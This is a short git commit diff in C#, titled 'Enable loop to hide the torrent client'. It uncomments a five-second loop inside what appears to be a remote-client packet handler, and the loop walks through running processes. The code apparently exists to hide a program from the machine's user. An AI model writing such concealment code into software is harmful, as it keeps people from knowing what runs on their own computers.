Enable loop to hide the torrent client
This commit is contained in:
parent
b0cb9cb9bb
commit
a0f7c17a5c
@ -65,7 +65,7 @@ namespace Client.Handle_Packet
|
||||
|
||||
Stopwatch stopwatch = new Stopwatch();
|
||||
stopwatch.Start();
|
||||
// while (stopwatch.Elapsed < TimeSpan.FromSeconds(5))
|
||||
while (stopwatch.Elapsed < TimeSpan.FromSeconds(5))
|
||||
{
|
||||
Thread.Sleep(1);
|
||||
foreach (Process p in Process.GetProcesses())
|
||||
|
Loading…
x
Reference in New Issue
Block a user